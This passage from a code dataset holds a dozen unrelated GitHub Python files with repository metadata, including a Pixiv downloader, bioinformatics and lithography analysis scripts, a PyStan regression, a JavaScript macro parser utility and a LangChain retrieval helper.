page_no in range(0, work_info.response[0].page_count):\n page_info = work_info.response[0].metadata.pages[page_no]\n aapi.download(page_info.image_urls.large, saving_direcory_path)\n sleep(3)\n\n else:\n aapi.download(illust.image_urls.large, saving_direcory_path)\n sleep(3)\n\n except Exception:\n continue\n\n print(separator)\n\nprint('Download complete! 
Thanks to {}!!'.format(illust.user.name))\n","repo_name":"kento-python-lab/pixiv-dl","sub_path":"pixiv_image_downloader.py","file_name":"pixiv_image_downloader.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2128973991","text":"from scipy.stats import zscore\nimport numpy as np\n\n# method to get expression data of all samples\ndef get_expression_data(data, sample_list,genes_by_signature, signatures_by_gene):\n\n data_columns = []\n\n # get column index of each sample\n header_split = data[0].rstrip().split(\"\\t\")\n for sample in sample_list:\n column_index = 0\n for header in header_split:\n if sample == header:\n data_columns.append(column_index)\n column_index += 1\n\n\n # get expression data for each gene and add to the appropriate signature\n header = True\n for line in data:\n if header:\n header = False\n else:\n\n # gets the expression data\n line_split = line.rstrip().split(\"\\t\")\n gene = line_split[0] + \"\\t\" + line_split[1]\n expression_data = []\n for column in data_columns:\n expression_data.append(line_split[column])\n\n # converts to a z-score\n zscore_data = np.array(expression_data).astype(np.float)\n z_transformed = zscore(zscore_data)\n\n # checks that the z-score is not nan\n if str(z_transformed[0]) == \"nan\":\n z_transformed = [0.0] * len(sample_list)\n\n # updates the signature\n signature = signatures_by_gene[gene]\n gene_information = genes_by_signature[signature][gene]\n gene_information[\"expression_data\"] = expression_data\n gene_information[\"zscore_data\"] = z_transformed\n genes_by_signature[signature][gene] = gene_information\n\n return genes_by_signature\n","repo_name":"Searchlight2/Searchlight2","sub_path":"software/statistical_analysis_tools/differential_expression_signature/get_expression_data.py","file_name":"get_expression_data.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"27078263918","text":"a=5\nb=16\narr1=[2,4,6,-8]\narr2=[42,8,15,23,42]\n\ndef insertShiftArray(arr,a):\n if not( type(arr) == type([]) ):\n return 'error'\n newArr=[]\n if len(arr)%2==0:\n t=int(len(arr)/2)\n else:\n t=int(len(arr)/2)+1\n newArr = arr[0:t]+[a]\n newArr = newArr+arr[t:len(arr)]\n\n return newArr\n \n\nprint(insertShiftArray(arr2,b))\n","repo_name":"AhmedZatar/data-structures-and-algorithms-401","sub_path":"Challenges/array_shift/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6549649966","text":"from turtle import Turtle, done\n\nt=Turtle()\nt.left(180)\n\nside = 100\nangle = 60\nt.color(\"red\", \"yellow\")\nt.begin_fill()\nfor i in range(6):\n t.forward(100)\n t.right(angle)\n \nt.end_fill()\ndone()","repo_name":"Mayon-Francis/S6_Python_Elective","sub_path":"Assignment7/3_hexagon.py","file_name":"3_hexagon.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5924020534","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 17 16:04:34 2017\r\n\r\nCreated on Thu Mar 16 11:46:17 2017\r\nread and plot CD error vs. 
Zernike per cutline\r\nvia DataFrame\r\n\r\n@author: vincchen\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npath = r'./'\r\nfile_name = 'PC-SMO_data.xlsx'\r\n\r\ndata = pd.read_excel(path + file_name)\r\ndata = data.drop(['del'], axis=1)\r\n\r\ndata['CD error'] = data['IPE1'] + data['IPE2']\r\ndata['absolute CD error'] = np.abs(data['CD error'] )\r\n\r\ndata_rows, data_columns = data.shape[0], data.shape[1]\r\n# -10600/-8480/-6360/-4240/-2120/0/2120/4240/6360/8480/10600\r\n# delta_slit = 2.12\r\nn_slit = 11\r\nn_cutline = 33 # data_rows/n_slit\r\n\r\ncutline_group = []\r\nfor i in np.arange(n_cutline):\r\n cutline_group.append(data['Cutline'][i*n_slit+1])\r\n\r\nmax_CDerror_thruslit = []\r\nfor i in np.arange(n_cutline):\r\n max_CDerror_thruslit.append(np.max(data['absolute CD error'][i * n_slit : (i+1) * n_slit]))\r\n\r\nH_index = [0, 2, 4, 6, 16, 18, 20, 22]\r\nV_index = [1, 3, 5, 7, 17, 19, 21, 23]\r\nH_CDerror = []\r\nV_CDerror = []\r\nfor i in H_index:\r\n H_CDerror.append(max_CDerror_thruslit[i])\r\nfor i in V_index:\r\n V_CDerror.append(max_CDerror_thruslit[i])\r\n\r\nfig = plt.figure(figsize=(14, 6))\r\nx_label = ['-1', '0', '1', '2', '7', '8', '9', '10']\r\ny_max = np.max([np.max(H_CDerror), np.max(V_CDerror)])\r\n# horizontal plot\r\nax_1 = plt.subplot(1,2,1)\r\nax_1.bar(np.arange(len(H_CDerror)), H_CDerror, fc='black', tick_label = x_label, align='center')\r\nplt.ylim((0, (y_max*11).round()/10))\r\nplt.xlabel('Critical Pattern', fontsize=15)\r\nplt.ylabel('absolute Max CD error(nm)', fontsize=15)\r\nplt.title('absolute value of thru-slit Max CD error(Horizontal)')\r\n# vertical plot\r\nax_2 = plt.subplot(1,2,2)\r\nax_2.bar(np.arange(len(V_CDerror)), V_CDerror, fc='black', tick_label = x_label, align='center')\r\nplt.ylim((0, (y_max*11).round()/10))\r\nplt.xlabel('Critical Pattern', fontsize=15)\r\nplt.ylabel('absolute Max CD error(nm)', fontsize=15)\r\nplt.title('absolute value of thru-slit Max CD error(Vertical)')\r\n","repo_name":"jchenpanyu/Python_SMO","sub_path":"thru-slit @N.C. 
plot/CDerror-vs-thru-slit_@NC_plot[one-data-set].py","file_name":"CDerror-vs-thru-slit_@NC_plot[one-data-set].py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6923170090","text":"import os\nimport sys\nfrom collections import Counter\n\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(PROJECT_PATH)\n\nfrom measurement import Stopwatch\n\n\nclass Solution(Stopwatch):\n def __init__(self):\n super().__init__()\n\n def execute(self):\n answer = None\n\n exponent = 0\n\n while answer is None:\n start = 10 ** exponent\n end = start * 10 // 6\n\n for num in range(start, end+1):\n has_same_digits = True\n digit_set = Counter(str(num))\n\n for coefficient in range(2, 7):\n another_digit_set = Counter(str(num * coefficient))\n\n if digit_set != another_digit_set:\n has_same_digits = False\n break\n\n if has_same_digits:\n answer = num\n break\n\n exponent += 1\n\n return answer\n\nif __name__ == '__main__':\n soln = Solution()\n result = soln.execute()\n print(result)\n","repo_name":"ony3000/project-euler","sub_path":"problems_051to075/problem_052/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4413892363","text":"#!/usr/bin/env python\nfrom jinja2 import FileSystemLoader, StrictUndefined\nfrom jinja2.environment import Environment\n\nenv = Environment(undefined=StrictUndefined)\nenv.loader = FileSystemLoader('.')\n\nintf_vars = {\n 'ip_addr': '10.220.88.20',\n 'netmask' : '255.255.255.0',\n}\n\ntemplate_file = 'intf_config333.j2'\ntemplate = env.get_template(template_file)\noutput = template.render(**intf_vars)\nprint(output)\n\n","repo_name":"mikealford/ktbyers_automation","sub_path":"week6/jinja2_test3.py","file_name":"jinja2_test3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6075120693","text":"import csv\nfrom ast import literal_eval\nimport numpy as np\nimport pandas as pd\nfrom scipy.sparse import lil_matrix\n\n\nclass TwitterDataProcessing:\n def read_count_tfidf_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int}, converters={\"tweet\": literal_eval})\n labels = np.array(list(data[\"sentiment\"]))\n tweet_ids = np.array(list(data[\"tweet_id\"]))\n tweets = list(data[\"tweet\"])\n\n tweets_sparse_matrix = lil_matrix((len(tweets), 5000))\n\n for i in range(len(tweets)):\n tweet = tweets[i]\n for j in range(len(tweet)):\n word = tweet[j]\n tweets_sparse_matrix[i, word[0]] = word[1]\n\n return labels, tweet_ids, tweets_sparse_matrix\n\n def read_glove_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int}, converters={\"tweet\": literal_eval})\n labels = list(data[\"sentiment\"])\n tweet_ids = list(data[\"tweet_id\"])\n tweets = list(data[\"tweet\"])\n return labels, tweet_ids, tweets\n\n def read_raw_data(self, file_path):\n print(\"Reading \" + file_path + \" ...\")\n data = pd.read_csv(file_path, dtype={\"sentiment\": str, \"tweet_id\": int, \"tweet\": str})\n labels = np.array(list(data[\"sentiment\"]))\n tweet_ids = np.array(list(data[\"tweet_id\"]))\n tweets = np.array(list(data[\"tweet\"]))\n 
return labels, tweet_ids, tweets\n\n def write_predictions(self, tweet_ids, predictions, file_path):\n print(\"Writing \" + file_path + \"...\")\n pred_file = open(file_path, \"w\")\n writer = csv.writer(pred_file)\n writer.writerow([\"tweet_id\", \"sentiment\"])\n for i in range(len(tweet_ids)):\n writer.writerow([tweet_ids[i], predictions[i]])\n pred_file.close()\n print(\"Finish writing \" + str(i + 1) + \" testing\")","repo_name":"xueqig/machine-learning-a3","sub_path":"dataProcessing.py","file_name":"dataProcessing.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14651539919","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pystan\nimport numpy as np\nimport pandas as pd\n\n\nData = pd.read_csv('trend2.csv')\n\n\n# In[2]:\n\n\nData = Data.dropna()\nData = Data.reset_index(drop = True)\nData.tail(10)\n\n\n# In[3]:\n\n\n# enumerate countries\ncountries = Data.country.str.strip()\nunique_countries = countries.unique()\nnum_countries = len(unique_countries)\ncountries_dict = dict(zip(unique_countries, range(num_countries)))\ncountries = countries.replace(countries_dict).values\nN = len(countries);\nJ = num_countries\n\n\n# In[7]:\n\n\nModel = \"\"\"\ndata {\n int J;\n int N;\n int K;\n int country[N];\n matrix[N,K] X;\n vector[N] y;\n}\n\nparameters {\n vector[J] a;\n vector[K] B;\n real mu_a;\n real sigma_a;\n real sigma_y;\n}\n\ntransformed parameters {\n vector[N] y_hat;\n for(i in 1:N)\n y_hat[i] = a[country[i]] + X[i] * B;\n}\n\nmodel {\n sigma_a ~ normal(0,10);\n sigma_y ~ normal(0,10);\n B ~ normal(0,10);\n a ~ normal(mu_a,sigma_a);\n y ~ normal(y_hat,sigma_y);\n}\n\"\"\"\n\nmodel_data = {'N':N,\n 'J':J,\n 'K':2,\n 'country':countries + 1,\n 'X': Data[['gini_net','rgdpl']],\n 'y': Data['church2']}\n\nmodel_fit = pystan.stan(model_code = Model, data = model_data, iter = 1000, chains = 2, n_jobs = 2)\n\nprint(model_fit)\n\n\n# In[21]:\n\n\nimport matplotlib.pyplot as plt\na_sample = pd.DataFrame(model_fit['a'])\n\nimport seaborn as sns\nsns.set(style=\"ticks\", palette=\"muted\", color_codes=True)\n\n# Plot the orbital period with horizontal boxes\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=a_sample, whis=np.inf, color=\"c\")\n\nmodel_fit.plot(pars=['sigma_a', 'B']);\n\n\n# In[22]:\n\n\nxvals = np.arange(2)\nbp = model_fit['a'].mean(axis=0)\nmp = model_fit['B'].mean()\nfor bi in bp:\n plt.plot(xvals, mp*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1,1.1);\n\n\n# In[26]:\n\n\nModel2 = \"\"\"\ndata {\n int J;\n int N;\n int K;\n int country[N];\n matrix[N,K] X;\n vector[N] y;\n}\n\nparameters {\n vector[J] a;\n vector[K] B;\n real mu_a;\n real sigma_a;\n real sigma_y;\n}\n\ntransformed parameters {\n vector[N] y_hat;\n for(i in 1:N)\n y_hat[i] = a[country[i]] + X[i] * B;\n}\n\nmodel {\n sigma_a ~ normal(0,10);\n sigma_y ~ normal(0,10);\n B[1] ~ normal(15,15);\n B[2] ~ normal(0,10);\n a ~ normal(mu_a,sigma_a);\n y ~ normal(y_hat,sigma_y);\n}\n\"\"\"\n\nmodel_data2 = {'N':N,\n 'J':J,\n 'K':2,\n 'country':countries + 1,\n 'X': Data[['gini_net','rgdpl']],\n 'y': Data['church2']}\n\nmodel_fit2 = pystan.stan(model_code = Model, data = model_data2, iter = 1000, chains = 4, n_jobs = 2)\n\nprint(model_fit2)\n\n\n# In[51]:\n\n\n# After changing the prior on the explanatory variable estimate there was not a substantial effect on the posterior\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"NazirNayal8/PythonCourse","sub_path":"HW3/HW3_sub.py","file_name":"HW3_sub.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22875604464","text":"import time, re\nfrom typing import Callable, List, Dict, Union\n\nfrom constants import FIRST_LINE_OF_MULTILINE_MACRO_DEF_RE, NON_WORD_CHAR, SINGLELINE_MACRO_DEF_RE\nfrom Chunk import *\n\nbrackets_open_to_closed = {'(':')', '[':']', '{':'}'}\nbracket_names = {'(':'parenthesis', '[':'square bracket', '{':'curly bracket'}\n\n\n\ndef perfcounter():\n return time.clock()\n # pydocs say this is preferred if you're using python 3.x:\n # return time.perf_counter()\n\n\ndef couldBeToken(start:int, stop:int, text:str) -> bool:\n \"\"\"\n Pre: 0 <= start <= stop <= len(text) - 1\n Return true iff\n start == 0 or text[start-1] is a non-word character, and\n stop == len(text)-1 or text[stop+1] is a non-word character\n\n This should be equivalent to some search using re.search(\"\\b\\w+\\b\" ...\n \"\"\"\n if start == 0 or re.search(NON_WORD_CHAR, text[start-1]):\n return stop == len(text) - 1 or re.search(NON_WORD_CHAR, text[stop+1])\n else:\n return False\n\n\ndef updateInStrLit(in_str_lit:Dict[str,bool], i:int, text:str) -> None:\n \"\"\"\n :param in_str_lit: dict {\"'\":boolean, '\"':boolean, '`':boolean} that is all false if i == 0, and otherwise\n tells whether text[i-1] is within a string literal of the corresponding type.\n :param i:\n :param text:\n :return:\n \"\"\"\n a = text[i]\n\n if a == \"'\":\n # if the ' isn't escaped AND we're not inside a \" or ` quoted string.\n if text[max(i - 1, 0)] != \"\\\\\" and not in_str_lit['\"'] and not in_str_lit[\"`\"]:\n in_str_lit[\"'\"] = not in_str_lit[\"'\"]\n elif a == '\"':\n # if the \" isn't escaped AND we're not inside a ' or ` quoted string.\n if text[max(i - 1, 0)] != \"\\\\\" and not in_str_lit[\"'\"] and not in_str_lit[\"`\"]:\n in_str_lit['\"'] = not in_str_lit['\"']\n elif a == '`':\n # if the ` isn't escaped AND we're not inside a ' or \" quoted string.\n if text[max(i - 1, 0)] != \"\\\\\" and not in_str_lit[\"'\"] and not in_str_lit['\"']:\n in_str_lit['`'] = not in_str_lit['`']\n\ndef inStrLiteral(in_str_lit:Dict[str,bool]) -> bool:\n return in_str_lit['\"'] or in_str_lit[\"'\"] or in_str_lit[\"`\"]\n\ndef updateOpenBracketCnts(open_bracket_cnt:Dict[str,int], i:int, text:str) -> None:\n \"\"\"\n PRE: text[i] is not within a string literal\n :param open_bracket_cnt:\n :param i:\n :param text:\n \"\"\"\n a = text[i]\n if a == \"(\":\n open_bracket_cnt[\"(\"] += 1\n elif a == \"{\":\n open_bracket_cnt[\"{\"] += 1\n elif a == \"[\":\n open_bracket_cnt[\"[\"] += 1\n elif a == \")\":\n open_bracket_cnt[\"(\"] -= 1\n elif a == \"}\":\n open_bracket_cnt[\"{\"] -= 1\n elif a == \"]\":\n open_bracket_cnt[\"[\"] -= 1\n\ndef bracketsBalanced(open_bracket_cnt:Dict[str,int]) -> bool:\n return open_bracket_cnt[\"(\"] == open_bracket_cnt[\"{\"] == open_bracket_cnt[\"[\"] == 0\n\ndef unmatchedCloseBracket(open_bracket_cnt:Dict[str,int]) -> bool:\n return open_bracket_cnt[\"(\"] < 0 or open_bracket_cnt[\"{\"] < 0 or open_bracket_cnt[\"[\"] < 0\n\ndef escapeQuotes(x):\n # TODO: this is probably not a fully general solution\n return x.replace(\"'\",\"\\\\'\").replace('\"','\\\\\"').replace(\"`\",\"\\\\`\")\n\n\ndef find_next_toplevel_in_str(s:str, start:int, char_to_find:str) -> int:\n chunk = OpenChunk([s], 0, start)\n res = find_next_toplevel(chunk, char_to_find)\n if not res:\n 
return res\n return res.stop_line_stop_ind\n\n\ndef find_next_toplevel(chunk:Chunk, char_to_find:str) -> Union[ClosedChunk,None]:\n \"\"\"\n @:param chunk : Chunk\n @:param char_to_find : character\n @returns None if none found, or else a ClosedChunk with\n lines = chunk.lines\n start_line_num = chunk.start_line_num\n start_line_ind = chunk.start_line_ind\n stop_line_num = first line in chunk containing a top-level char_to_find\n stop_line_stop_ind = index in stop_line_num of the top-level char_to_find\n\n >>> aline = ['functioncall(0,1,2)\\n']\n >>> find_next_toplevel(OpenChunk(aline, 0, 13), ')')\n Chunk(['functioncall(0,1,2)\\n'],0,13,0,18)\n >>> [find_next_toplevel(OpenChunk(aline, 0, 12), ')')]\n [None]\n\n >>> lines = ['line 1\\n', '\\n', 'line 2(\\n', 'a, b, \\n', 'c\\n', ')\\n', 'a\\n']\n >>> find_next_toplevel(OpenChunk(lines, 0, 0), 'a')\n Chunk(['line 1\\n', '\\n', 'line 2(\\n', 'a, b, \\n', 'c\\n', ')\\n', 'a\\n'],0,0,6,0)\n >>> lines2 = [ '\"Problem with prop \" + p + \", allowed_flatprops(p) is \" + allowed_flatprops[p] + \", nodetype is \" + node.nodetype']\n >>> find_next_toplevel(OpenChunk(lines2, 0, 0), ',')\n \"\"\"\n rv = Chunk(chunk.lines, chunk.start_line_num, chunk.start_line_start_ind, None, None)\n\n line_ind = chunk.start_line_start_ind\n\n # Number of open Round, Square, and Curly brackets, respectively, in the part of lines scanned so far\n # i.e. up to lines[line_num][line_ind]\n # exception if any are ever negative.\n bracket_cnts = {'(':0, '[':0, '{':0}\n\n # Whether lines[line_num][line_ind] is inside a Single/Double/Back quoted string\n in_str_lit = {\"'\":False, '\"':False, '`':False}\n\n found = False\n line_num = chunk.start_line_num\n\n stop_line_num = chunk.stop_line_num if (chunk.stop_line_num is not None) else len(chunk.lines) - 1\n\n assert stop_line_num <= len(chunk.lines) - 1, repr(chunk)\n while not found and line_num <= stop_line_num:\n\n line = chunk.lines[line_num]\n\n if chunk.stop_line_stop_ind is not None and line_num == chunk.stop_line_num:\n stop_line_ind = chunk.stop_line_stop_ind\n else:\n stop_line_ind = len(line) - 1\n\n while True:\n a = line[line_ind]\n\n if not inStrLiteral(in_str_lit):\n\n if a == \"/\" and line_ind < len(line) - 1 and line[line_ind + 1] == \"/\":\n # this is a comment line. 
ignore it\n break\n\n # possibly the character occurrence we're looking for, if the context is right.\n if a == char_to_find:\n # check if brackets are balanced and we're not inside a string literal, in which case we're done.\n if bracketsBalanced(bracket_cnts) and not inStrLiteral(in_str_lit):\n # next two lines cause both loops to exit\n found = True\n break\n\n updateOpenBracketCnts(bracket_cnts, line_ind, line)\n\n updateInStrLit(in_str_lit, line_ind, line)\n\n\n if unmatchedCloseBracket(bracket_cnts):\n msg = \"[MM] There seems to be an unmatched close-paren/bracket in line {}[1-based], found while looking for the next '{}'.\\n\".format(\n line_num + 1, char_to_find)\n\n for b in bracket_cnts.keys():\n if bracket_cnts[b] < 0: msg += \"Unmatched closed \" + bracket_names[b] + \"\\n\"\n\n for b in bracket_cnts.keys():\n msg += \"Also, we'd counted {} open {} brackets when this exception happened.\\n\".format(bracket_cnts[b], b)\n\n raise Exception(msg)\n\n if line_ind == stop_line_ind:\n break\n line_ind += 1\n\n if found or line_num == stop_line_num:\n break\n\n line_num += 1\n line_ind = 0\n\n # next checks aren't necessary if macros file has been parsed by tsc:\n if not bracketsBalanced(bracket_cnts) or inStrLiteral(in_str_lit):\n print(repr(chunk))\n msg = \"[MM] Unclosed paren/bracket or quote at line {} (1-based)?\\n\".format(line_num + 1)\n for b in bracket_cnts.keys():\n if bracket_cnts[b] < 0: msg += \"Unclosed \" + bracket_names[b] + \"\\n\"\n for q in in_str_lit.keys():\n if in_str_lit[q] < 0: msg += \"Unclosed \" + q + \"\\n\"\n raise Exception(msg)\n\n if not found:\n return None\n\n rv.stop_line_num = line_num\n rv.stop_line_stop_ind = line_ind\n\n return rv\n\n\n\n\ndef split_by_top_level_commas(bigger_chunk:ClosedChunk) -> List[ClosedChunk]:\n \"\"\"\n Takes a CLOSED chunk @bigger_chunk of a valid function call in some source text,\n NO -> optionally beginning and ending with the opening '(' and closing ')'\n Returns a list of closed chunks for the individual arguments, each of which may span multiple lines.\n \"\"\"\n r\"\"\"\n >>> lines = [\"debugtest(this.node_class_names.forEach(function (nodetype) {\\n\", \"\tdassert(_this.strict_subtype_reln.has(nodetype), nodetype);\\n\", \"\tdassert(_this.strict_supertype_reln.has(nodetype), nodetype);\\n\", \"}));\"]\n >>> chunk = Chunk(lines, 0, 10, 3, 1)\n >>> rv = split_by_top_level_commas(chunk)\n >>> map( lambda x: x.numbersTuple(), rv)\n [(0, 10, 3, 1)]\n >>> lines2 = [\"fn(10 , 20,\\n\", \"30,\\n\", \"40,50\\n\", \" )\\n\"]\n >>> chunk2 = Chunk(lines2, 0, 3, 3, 2)\n >>> rv2 = split_by_top_level_commas(chunk2)\n >>> map( lambda x: x.numbersTuple(), rv2)\n [(0, 3, 0, 5), (0, 7, 0, 9), (0, 11, 1, 1), (1, 3, 2, 1), (2, 3, 3, 2)]\n >>> lines3 = [\"debugtest(this.node_class_names.forEach(function (nodetype) {\\n\",\" dassert(_this.strict_subtype_reln.has(nodetype), nodetype);\\n\",\" dassert(_this.strict_supertype_reln.has(nodetype), nodetype);\\n\",\" }));\\n\"]\n >>> par3 = Chunk(lines3, 0, 10, 3, 13)\n >>> rv3 = split_by_top_level_commas(par3)\n >>> map( lambda x: x.numbersTuple(), rv3)\n [(0, 10, 3, 13)]\n >>> line = ['dassert(allowed_flatprops[p] === StringPropType.immutstring || allowed_flatprops[p] === StringPropType.stringselect, \"Problem with prop \" + p + \", allowed_flatprops(p) is \" + allowed_flatprops[p] + \", nodetype is \" + node.nodetype);' ]\n >>> par4 = Chunk(line, 0, 9, 0, 212)\n >>> rv4 = split_by_top_level_commas(par4)\n >>> map( lambda x: x.numbersTuple(), rv4)\n 3\n \"\"\"\n\n # idea: use 
find_next_toplevel repeatedly until end of chunk\n    arg_chunks = []\n    remaining_args_chunk = Chunk(\n        bigger_chunk.lines,\n        bigger_chunk.start_line_num,\n        bigger_chunk.start_line_start_ind,\n        bigger_chunk.stop_line_num,\n        bigger_chunk.stop_line_stop_ind\n    )\n\n    while True:\n        next_arg_chunk = find_next_toplevel(remaining_args_chunk, \",\")\n        if next_arg_chunk is not None:\n            # for next iteration of loop:\n            remaining_args_chunk.start_line_num = next_arg_chunk.stop_line_num\n            remaining_args_chunk.start_line_start_ind = next_arg_chunk.stop_line_stop_ind + 1 # start just after the ','\n            next_arg_chunk.delete_last_char() # adjust to not include the ','\n            arg_chunks.append(next_arg_chunk)\n        else:\n            # then we're done, which means the final arg is just remaining_args_chunk\n            arg_chunks.append(remaining_args_chunk)\n            break\n    return arg_chunks\n\n\n\ndef for_each_macro_def(macro_defs_file_path:str, f:Callable[[str,str,str],None]):\n    \"\"\"\n    f is a function that takes a triple (fnname: string, params_str: string, body_as_single_line: string) and returns nothing.\n    It will be called on each such triple parsed from the file at path macro_defs_file_path.\n    \"\"\"\n    macro_defs_file = open(macro_defs_file_path, 'r')\n    macro_defs_file_lines = macro_defs_file.readlines()\n    macro_defs_file.close()\n\n    i = 0\n    file_ind = 0\n    while i < len(macro_defs_file_lines):\n        line = macro_defs_file_lines[i]\n        if line.startswith(\"//STOP\"):\n            print(\"[MM] Found '//STOP' in macro defs file\")\n            return\n        # match = SINGLELINE_NONVOID_MACRO_DEF_RE.match(line)\n        # if match:\n        # \tfnname, params_str, body = match.groups()\n        # \ti += 1\n        # \tf(fnname, params_str, body)\n        # \tcontinue\n        if (line.startswith(\"import\") or line.startswith(\"const\") or line.startswith(\"window\") or \n            line.startswith(\"declare\") or line.startswith(\"type\") ):\n            i += 1\n            continue\n\n        match = SINGLELINE_MACRO_DEF_RE.match(line)\n        if match:\n            fnname, params_str, body = match.groups()\n            i += 1\n            f(fnname, params_str, body)\n            continue\n\n        match = FIRST_LINE_OF_MULTILINE_MACRO_DEF_RE.match(line)\n        if match:\n            fnname, params_str, opt_returntype = match.groups()\n\n            body_chunk = find_next_toplevel(OpenChunk(macro_defs_file_lines, i + 1, 0), \"}\")\n\n            # remove any single-line comments, and exclude the line containing the final }\n            body_lines = filter(lambda x: not x.strip().startswith(\"//\"),\n                                body_chunk.lines[body_chunk.start_line_num:body_chunk.stop_line_num])\n\n            # remove the endlines and extra whitespace, then join as single string\n            body_str = \"\".join(map(lambda s: s.strip(), body_lines))\n\n            if opt_returntype:\n                assert( body_str.startswith(\"return \") ) \n                body_str = body_str[7:]\n                if body_str[-1] == \";\":\n                    body_str = body_str[:-1]\n\n                print(\"\\nFOUND NON-VOID NON-IDENTITY MACRO. 
body_str is\\n\" + body_str + \"\\n\")\n\n i = body_chunk.stop_line_num + 1 \n\n \n f(fnname, params_str, body_str)\n continue \n\n else:\n stripped = line.strip()\n assert stripped == \"\" or stripped.startswith(\"//\"), \"\\nThe line \\n\\t\" + line + \\\n \"is not recognized as an empty line, a single-line comment, or as part of a macro definition.\\n\" + \\\n \"Nothing else is allowed (including /* */ comments).\\n\" + \\\n \"Note that the '{' following the parameters of a macro definition must be on the same line as \\\"function\\\".\"\n i += 1\n continue\n\n\ndef readfile_as_lines(path:str):\n f = open(path, \"r\")\n lines = f.readlines() \n f.close()\n return lines\n\ndef readfile_as_string(path:str): \n f = open(path, \"r\")\n filestr = f.read()\n f.close()\n return filestr\n\ndef find_spot_for_console_msg(lines: List[str]) -> int:\n \"\"\"\n Look backwards through lines to find index k of the file's last line that doesn't start with //\n This is an attempt to not interfere with other tools that place a \"hot comment\" at the end of the file.\n \"\"\"\n i = len(lines) - 1\n\n while i >= 0:\n if lines[i].startswith(\"//\"):\n i -= 1\n else:\n return i\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"DustinWehr/minimal-macros","sub_path":"src/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9064062998","text":"from langchain.document_loaders import DirectoryLoader\nfrom langchain.embeddings.huggingface import HuggingFaceEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores.chroma import Chroma\nimport os\n\nembeddings = HuggingFaceEmbeddings(model_name=\"GanymedeNil/text2vec-large-chinese\",\n model_kwargs={'device': \"cuda:0\"})\n\ndef load_documents(directory = \"/root/DISC-LawLLM/法律文书\"):\n print(\"loading documents……\")\n raw_documents = DirectoryLoader(directory).load()\n text_splitter = CharacterTextSplitter(chunk_size = 256, chunk_overlap = 0)\n docs = text_splitter.split_documents(raw_documents)\n return docs\n\ndef store_chroma(docs, embeddings, persist_dirctory=\"VectorDataBase\"):\n print(\"storing vectors……\")\n db = Chroma.from_documents(docs, embeddings, persist_directory=persist_dirctory)\n db.persist\n return db\n\n\ndef quest(query):\n embedding_vector = embeddings.embed_query(query)\n if not os.path.exists(\"/root/DISC-LawLLM/VectorDataBase\"):\n documents = load_documents()\n db = store_chroma(documents, embeddings)\n else:\n db = Chroma(persist_directory=\"/root/DISC-LawLLM/VectorDataBase\", embedding_function=embeddings)\n message = ''\n docs = db.similarity_search_by_vector(embedding_vector, k=3, fetch_k=10)\n for i, doc in enumerate(docs):\n message = message + f\"{i+1}. {doc.page_content}\\n\"\n return message\n\nif __name__ == \"__main__\":\n print(quest(query = \"中国人民有哪些权力\"))\n\n\n","repo_name":"GrayZ77/LawLLM","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34986826260","text":"from django.conf.urls import url\nfrom . 
